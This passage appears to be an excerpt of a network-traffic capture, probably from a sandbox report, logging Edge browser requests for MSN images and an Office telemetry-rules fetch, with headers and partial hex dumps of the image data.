2024-11-09 01:47:34 UTC	634	OUT	GET /tenant/amp/entityid/BB1msBaE.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:34 UTC	519	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msBaE Last-Modified: Fri, 01 Nov 2024 13:37:48 GMT X-Source-Length: 57629 X-Datacenter: eastus X-ActivityId: b60cd1ab-74a5-433f-a8bd-c2635cba75d6 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 57629 Cache-Control: public, max-age=172159 Expires: Mon, 11 Nov 2024 01:36:53 GMT Date: Sat, 09 Nov 2024 01:47:34 GMT Connection: close
2024-11-09 01:47:34 UTC	15865	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-09 01:47:34 UTC	16384	IN	Data Raw: 27 29 59 4d 47 48 cd 8c f2 8f 29 a8 04 63 94 aa 34 19 2d 59 e5 1d 1a a4 51 2d 18 50 f2 9b 50 eb 80 b1 86 51 65 3a 29 0e 91 ab 66 9c f9 50 f2 9b d0 b2 8b 65 96 50 ca 69 94 74 56 59 0d 1a d0 b2 a0 24 74 3a a1 95 9b 2a 0a 2a 87 40 4d 0c b1 d2 08 81 d1 74 3a 09 6c e8 74 69 43 a0 96 ce 82 8d 68 28 23 2a 1d 33 51 e0 0b 65 43 a3 4a 45 50 4b 65 94 32 9b 50 50 4b 65 94 28 d6 87 40 65 41 46 b4 14 82 5b 2a 1d 1a 50 50 2d 03 2e 82 82 20 65 50 e8 09 15 71 2e 82 8a 26 8a a2 a8 64 44 57 12 b0 18 14 01 e4 14 19 57 20 87 95 70 0c 8b 72 3c 1f 8c f7 0d 5e fb dd 94 34 65 28 c9 4a da b6 94 97 27 5e 67 c2 ff 00 ed ff 00 8a 29 56 79 45 57 e2 4e 6f fe 9c 4b 18 f7 cd 26 bd d0 fd 67 c3 e0 2c 9c 19 f3 7f 03 ee 1d f3 ba 43 51 77 9e f3 a9 a8 9e 5c 91 ff 00 31 e5 db 6f e6 4b 6e 18 23 Data Ascii: ')YMGH)c4-YQ-PPQe:)fPePitVY$t:*@Mt:ltiCh(#3QeCJEPKe2PPKe(@eAF[*PP-. ePq.&dDWW pr<^4e(J'^g)VyEWNoK&g,CQw\1oKn#
2024-11-09 01:47:34 UTC	2996	IN	Data Raw: ed 25 bc b5 f0 98 ed 7a 53 d2 9e f9 c3 5e 3a 91 7d 53 6a 5d a7 26 af c2 15 e3 de 65 1e 32 d2 9b 58 ff 00 f6 e5 23 d3 fd 56 a4 24 94 fb bf 87 8a f9 65 9f 49 f5 3a 94 1f 9a 3a 5f 7b 8d a4 d6 ba be 59 66 97 94 bd c5 b9 85 b9 7c bf f2 9d 48 ab d2 ef 3d db 53 6a ac 74 e7 d5 e2 a5 eb 1c 7e 11 df 1a bc 9d 19 64 a5 ff 00 4c f6 75 1f 4b fa 8e eb a8 f2 be f1 06 f7 c3 51 34 fa d5 57 45 9b 78 31 92 4e 14 f7 5c 64 e9 79 48 b9 c8 f9 39 7c 1f be 57 cd a1 38 e1 b5 4e 3d aa 4e 2c c2 5f 0a ef 58 e5 c7 2e 2e 29 49 cd 75 28 e3 d3 1b 3e c2 5a 3a a9 52 d5 d7 ac 55 49 ad 55 d3 f3 de 3c 8e 5d 4e eb de 24 97 f9 b1 96 0b f1 c2 49 a7 cd 3d 39 41 ae 8c 50 ce 77 5f 27 e5 76 06 7d 81 7c 4f bd f3 b4 19 95 85 81 a8 cc ac 76 06 83 32 b6 17 c4 9a 8d 40 ca c7 98 8d 35 f2 0b 31 b1 e6 e0 29 Data Ascii: %zS^:}Sj]&e2X#V$eI::_{Yf\|H=Sjt~dLuKQ4WEx1N\dyH9\|W8N=N,_X..)Iu(>Z:RUIU<]N$I=9APw_'v}\|Ov2@51)
2024-11-09 01:47:34 UTC	16384	IN	Data Raw: 30 d6 4d ed f0 2b 37 41 cd 9e 1c 58 f3 c7 93 33 5d 1a be ae 9b e2 3b e2 8c 2f 87 98 ad f0 25 35 12 ea 4e c7 d5 da 73 60 5a ae 4c cb a4 36 5d 0b cc bc 7d 15 e6 61 4f 90 2c 0c cc 35 0e 8b e0 83 37 41 95 c7 88 b3 11 a7 4d f4 15 6b d2 f5 9c 79 ba 4d 13 5c 7c 89 50 b6 e8 ce ba 43 3f 57 91 9d 8a f8 31 43 a5 49 f0 2b 33 e0 73 76 06 63 2a eb cd c1 14 9a 7b 91 c9 98 9f 12 b7 12 96 dd fe 44 b9 61 b0 e4 5a a8 5e 32 dc 31 94 b8 7e 6b f1 df 88 77 a8 f7 fd 5d 29 4a 4a 3a 74 a3 17 8c 7f 0e da df 77 b6 cf 95 7a fa 8f 7f 46 ef 51 f6 1f c5 1a 5d de f4 f5 15 ad 69 5d f2 71 e3 c6 f6 1f 09 19 49 3b 47 d1 1e cf 33 f2 69 ce 75 b7 63 ef 1a 91 54 9b e7 b7 69 1f a8 94 9e 2d f5 b3 29 73 66 78 3d b8 1a 72 6b 2d 47 2d e2 f1 27 ce bb 08 49 6e 0c 78 06 54 e6 df 36 2b bd 8c 91 f6 80 f1 Data Ascii: 0M+7AX3];/%5Ns`ZL6]}aO,57AMkyM\\|PC?W1CI+3svc*{DaZ^21~kw])JJ:twzFQ]i]qI;G3iucTi-)sfx=rk-G-'InxT6+
2024-11-09 01:47:34 UTC	6000	IN	Data Raw: 4b a4 d1 38 7f 57 42 ae d3 9b e5 e0 8a f9 96 c6 9f 40 2d be 75 b9 45 74 ed f3 1a 97 27 25 c1 6c 39 f3 3d e9 be b2 d2 bc 63 78 11 ab 6d e2 fd 9e d2 fc 47 e8 2f ae b3 0e 99 27 cf 02 a3 28 6c 4e b8 3d 9d a6 5a 89 9d db f8 f2 e4 bc 87 e2 3a fc 2b d6 65 9b 76 1d 5b 0d 54 56 da 71 ea f6 19 d3 66 ae 77 96 6d af 46 ba da 34 52 7b a4 83 2d f2 64 34 96 ef 6a 0b ac 35 cd 2d fe 63 8b bd fe f3 25 26 b6 7c cb 93 f9 58 fc 58 ef 8d 74 92 96 e3 76 f4 f7 7a ca cb 33 9b c4 8f a4 d7 42 d8 5e 77 58 36 fb 2c 94 d4 4c 4b 6a ad b6 bc d1 6b 8c af b4 c1 6a ca 5b 53 f3 7e f1 a7 66 5a 37 b5 e1 bb 67 3e 22 a5 96 ee b8 2b f6 0b d5 d6 35 24 f7 f6 01 35 71 aa 5d 7b 7b 0d 71 df 5f 5c 99 2b 1d ff 00 7f 60 3b 58 5a fa e2 80 b7 5c 9d f6 19 38 c6 f0 b4 f9 ad 80 e4 d2 c7 67 4e cf 30 bb e4 ca Data Ascii: K8WB@-uEt'%l9=cxmG/'(lN=Z:+ev[TVqfwmF4R{-d4j5-c%&\|XXtvz3B^wX6,LKjkj[S~fZ7g>"+5$5q]{{q_\+`;XZ\8gN0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.7	53031	23.38.189.81	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	634	OUT	GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:34 UTC	516	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA13Q6AL Last-Modified: Sat, 02 Nov 2024 16:15:34 GMT X-Source-Length: 1658 X-Datacenter: eastus X-ActivityId: ea0e57a3-5607-4c33-987a-1fb59e967af8 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 1658 Cache-Control: public, max-age=268211 Expires: Tue, 12 Nov 2024 04:17:45 GMT Date: Sat, 09 Nov 2024 01:47:34 GMT Connection: close
2024-11-09 01:47:34 UTC	1658	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 06 2f 49 44 41 54 58 c3 d5 57 7d 6c 14 45 14 7f 33 b3 bb 77 d7 2b a5 e5 a3 48 a9 7c c4 10 82 44 12 25 d8 18 4d 8a 5a 35 11 49 0d d2 26 fc 51 03 c6 04 c3 57 03 25 a0 50 b0 11 21 d4 a4 26 02 51 f0 0b 22 06 12 30 a6 84 18 48 8a 5a 08 22 88 c4 80 80 f6 0f 3e 5a 01 11 90 c2 41 da bb 9d dd 19 df cc ee 6d f7 bc 83 16 89 31 ee e5 dd 9b 9d db 9d df ef fd de bc b7 7b 00 ff f1 41 ee f6 86 8d 0d 17 f3 be ed 3c bf 2d 61 d1 32 37 6a 15 09 d3 e0 c4 20 27 a4 41 b7 44 fb f7 db b4 6b 56 49 d7 bf 42 a0 a1 41 d2 a1 a2 e3 a5 7d 7f b6 6f 3a 2f ec b8 99 df 1f 68 3c 0f 88 45 01 0c 0a 04 4d 32 72 81 30 da 50 50 3c 6a d3 8e Data Ascii: PNGIHDR szzbKGD/IDATXW}lE3w+H\|D%MZ5I&QW%P!&Q"0HZ">ZAm1{A<-a27j 'ADkVIBA}o:/h<EM2r0PP<j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.7	53027	23.38.189.81	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	633	OUT	GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:34 UTC	515	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Tue, 29 Oct 2024 01:23:33 GMT X-Datacenter: westus X-ActivityId: cb9047c4-4547-48fb-b4d6-e543e2becb13 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAc9vHK X-Source-Length: 1218 Content-Length: 1218 Cache-Control: public, max-age=257736 Expires: Tue, 12 Nov 2024 01:23:10 GMT Date: Sat, 09 Nov 2024 01:47:34 GMT Connection: close
2024-11-09 01:47:34 UTC	1218	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 71 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 35 2d 63 30 31 34 20 37 39 2e 31 35 31 34 38 31 2c 20 32 30 31 33 2f 30 33 2f 31 33 2d 31 32 3a 30 39 3a 31 35 20 20 Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<qiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.7	53030	23.38.189.81	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	634	OUT	GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:34 UTC	517	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1lFz6G Last-Modified: Thu, 22 Aug 2024 19:49:06 GMT X-Source-Length: 5699 X-Datacenter: northeu X-ActivityId: 568c32c2-4fc6-43fd-b83e-f4c0fb930684 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Length: 5699 Cache-Control: public, max-age=283349 Expires: Tue, 12 Nov 2024 08:30:03 GMT Date: Sat, 09 Nov 2024 01:47:34 GMT Connection: close
2024-11-09 01:47:34 UTC	5699	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 84 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 05 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 4a 01 1b 00 05 00 00 00 01 00 00 00 52 01 28 00 03 00 00 00 01 00 02 00 00 87 69 00 04 00 00 00 01 00 00 00 5a 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 00 32 a0 03 00 04 00 00 00 01 00 00 00 32 00 00 00 00 86 f1 c2 a8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 Data Ascii: PNGIHDR22?gAMAa cHRMz&u0`:pQ<eXIfMM*JR(iZHH22pHYs

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.7	53032	23.38.189.81	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	634	OUT	GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:34 UTC	516	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Sat, 26 Oct 2024 13:08:49 GMT X-Datacenter: westus X-ActivityId: f9118471-d63a-4ae1-a8c4-33a84d8a076d Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1hk7Sh X-Source-Length: 6962 Content-Length: 6962 Cache-Control: public, max-age=429592 Expires: Thu, 14 Nov 2024 01:07:26 GMT Date: Sat, 09 Nov 2024 01:47:34 GMT Connection: close
2024-11-09 01:47:34 UTC	6962	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 0c 3f 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 84 12 40 40 4a e8 4d 10 a9 01 a4 84 d0 42 ef 08 36 42 12 20 94 18 03 41 c5 8e 2e 2a b8 76 b1 80 0d 5d 15 51 b0 02 62 47 ec 2c 8a bd 2f 16 54 94 75 b1 60 57 de a4 80 ae fb ca f7 e6 fb e6 ce 7f ff 39 f3 9f 33 e7 ce dc 7b 07 00 8d e3 3c 89 24 0f d5 04 20 5f 5c 28 8d 0f 0d 64 8e 4a 4d 63 92 9e 02 0c d0 01 15 38 01 4b 1e bf 40 c2 8e 8d 8d 04 b0 0c b4 7f 2f ef ae 03 44 de 5e 71 94 6b fd b3 ff bf 16 2d 81 b0 80 0f 00 12 0b 71 86 a0 80 9f 0f f1 7e 00 f0 2a be 44 5a 08 00 51 ce 5b 4c 2a 94 c8 31 ac 40 47 0a 03 84 78 be 1c 67 29 71 95 1c 67 28 f1 6e 85 4d 62 3c 07 Data Ascii: PNGIHDR22??iCCPICC ProfileHWXS[@@JMB6B A.v]QbG,/Tu`W93{<$ _\(dJMc8K@/D^qk-q~DZQ[L*1@Gxg)qg(nMb<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.7	53028	23.38.189.81	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	634	OUT	GET /tenant/amp/entityid/AA1t99ka.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:34 UTC	518	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1t99ka Last-Modified: Fri, 01 Nov 2024 18:01:15 GMT X-Source-Length: 20811 X-Datacenter: eastus X-ActivityId: f7ec68f9-61c4-4117-9b16-c229b5f431dd Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 20811 Cache-Control: public, max-age=188232 Expires: Mon, 11 Nov 2024 06:04:46 GMT Date: Sat, 09 Nov 2024 01:47:34 GMT Connection: close
2024-11-09 01:47:34 UTC	15866	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 01 90 08 02 00 00 00 0f dd a1 9b 00 00 0c 3e 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 10 20 80 80 94 d0 9b 20 22 25 80 94 10 5a 00 e9 45 b0 11 92 00 a1 c4 18 08 2a 76 74 51 c1 b5 8b 08 d8 d0 55 11 c5 0e 88 1d b1 b3 28 f6 be 58 50 50 d6 c5 82 5d 79 93 02 ba ee 2b df 9b 7c 33 f3 e7 9f 33 ff 39 73 ee dc 32 00 d0 4f f0 24 92 1c 54 13 80 5c 71 be 34 36 24 80 39 26 39 85 49 ea 02 28 a0 c2 df 50 40 e7 f1 f3 24 ec e8 e8 08 00 cb 40 ff f7 f2 ee 06 40 e4 fd 55 47 b9 d6 3f c7 ff 6b d1 12 08 f3 f8 00 20 d1 10 a7 09 f2 f8 b9 10 1f 00 00 af e2 4b a4 f9 00 10 e5 bc c5 94 7c 89 1c c3 0a 74 a4 30 40 88 17 ca 71 86 12 57 c9 71 9a 12 ef 51 d8 c4 c7 72 20 6e Data Ascii: PNGIHDR>iCCPICC ProfileHWXS[ "%ZE*vtQU(XPP]y+\|339s2O$T\q46$9&9I(P@$@@UG?k K\|t0@qWqQr n
2024-11-09 01:47:34 UTC	4945	IN	Data Raw: 3d f7 52 13 58 62 fb e9 21 5b 75 03 17 1c 54 6d 19 c9 a8 68 28 42 9d 72 18 59 2e 37 2a 0c 62 39 95 49 f4 d3 4f 3f dd 5c 95 c7 7f 5e 26 47 55 66 a3 ea 36 56 f1 51 09 75 c5 13 0a 63 96 51 3e 61 c6 4e 30 31 02 fb 25 ac ba ef f1 51 a3 42 71 d6 c4 60 4d d0 b4 22 a3 45 5b 46 7d 48 2d fb 24 ab b3 11 2c 12 46 4c d6 28 60 28 2f fd 89 ad 4e 3b ed b4 70 0a 37 30 5d 55 33 e8 8b ab f4 61 23 b0 4f 04 f6 4b 58 2e 2f c8 4a 25 4c 43 94 67 ef b3 5a 9d fd c0 11 18 09 68 2c 3c 41 d3 0e 86 ab 53 52 ba 3f f9 a6 85 af a7 7b ea 87 ad bc 55 63 45 55 e2 a9 dc ba b0 55 85 57 e3 55 5a 6e 04 0e 04 81 03 20 ac 72 d0 12 0e a4 66 5d c8 c1 22 50 bc b3 28 36 fa d0 96 53 95 ac 04 4a 67 05 4d 1e e7 99 a2 fa ae ef fa 2e 2f d3 58 05 2a c8 0a 49 b9 63 89 ac 13 61 49 46 40 5b 8b 77 92 17 17 ed Data Ascii: =RXb![uTmh(BrY.7b9IO?\^&GUf6VQucQ>aN01%QBq`M"E[F}H-$,FL(`(/N;p70]U3a#OKX./J%LCgZh,<ASR?{UcEUUWUZn rf]"P(6SJgM./XIcaIF@[w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.7	53035	13.107.246.57	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	438	OUT	GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:34 UTC	543	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:34 GMT Content-Type: image/png Content-Length: 1579 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT ETag: 0x8DBDCB5DE99522A x-ms-request-id: 22a8734b-901e-002d-304d-31ebc7000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241109T014734Z-17df447cdb54ntx4hC1DFW2k4000000006zg000000007h2c Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:34 UTC	1579	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 c0 49 44 41 54 78 01 ed 58 4f 8b 5c 45 10 af 7a f3 66 66 15 c5 fd 00 42 66 f2 05 b2 22 c2 1e 54 d6 4f 90 15 c1 63 d8 e0 49 04 37 01 11 11 25 89 e0 d5 04 0f 1a f0 e0 e6 62 c4 cb 1e 44 50 21 b8 df 20 7b f0 4f 6e 1b 4f 8b 20 cc 7a 89 b3 ef 75 57 f9 ab ea 9e 37 cb 66 77 66 36 93 83 84 ad a4 d3 fd de eb 79 fd 7b bf fa 55 75 75 88 4e ed d4 9e 20 5b d9 dc ed 2d df de ed d1 63 34 a6 39 6c e5 fb c1 4a 54 39 2f 42 ab 22 d2 8b 91 54 a2 92 d4 91 63 90 6d 09 74 57 2a fd fc b7 77 9e df a6 47 b4 47 02 b8 f2 f3 60 29 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxXO\EzffBf"TOcI7%bDP! {OnO zuW7fwf6y{UuuN [-c49lJT9/B"TcmtW*wGG`)

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.7	53034	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:34 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:34 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:34 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 7c56904f-a01e-0053-4d5c-2e8603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014734Z-15869dbbcc6rzfwxhC1DFWrkb000000005xg000000001s18 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
